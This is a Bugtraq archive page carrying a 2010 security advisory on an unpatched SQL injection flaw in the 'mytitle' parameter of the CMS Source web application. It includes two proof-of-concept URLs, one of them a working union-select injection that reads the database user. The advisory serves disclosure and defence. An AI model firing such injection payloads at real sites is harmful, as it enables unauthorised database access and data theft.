Home page logo
/

bugtraq logo Bugtraq mailing list archives

SQL injection vulnerability in CMS Source
From: advisory () htbridge ch
Date: Fri, 13 Aug 2010 09:13:19 +0200 (CEST)

Vulnerability ID: HTB22546
Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_cms_source.html
Product: CMS Source
Vendor: Proud Daddy Web Design ( http://www.prouddaddy.net/ ) 
Vulnerable Version: Current at 28.07.2010 and Probably Prior Versions
Vendor Notification: 28 July 2010 
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "index.php" script to properly sanitize user-supplied input in "mytitle" 
variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, 
compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL 
database.

Attacker can use browser to exploit this vulnerability. The following PoC is available:


http://host/home/demo1/index.php?target=actioncenter&subtarget=petition&mytitle=XX%27+ANY_SQL_CODE+--+
http://host/home/demo1/index.php?target=actioncenter&subtarget=petition&mytitle=XX%27+union+select+1,2,3,user%28%29,5,6,7+--+




  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault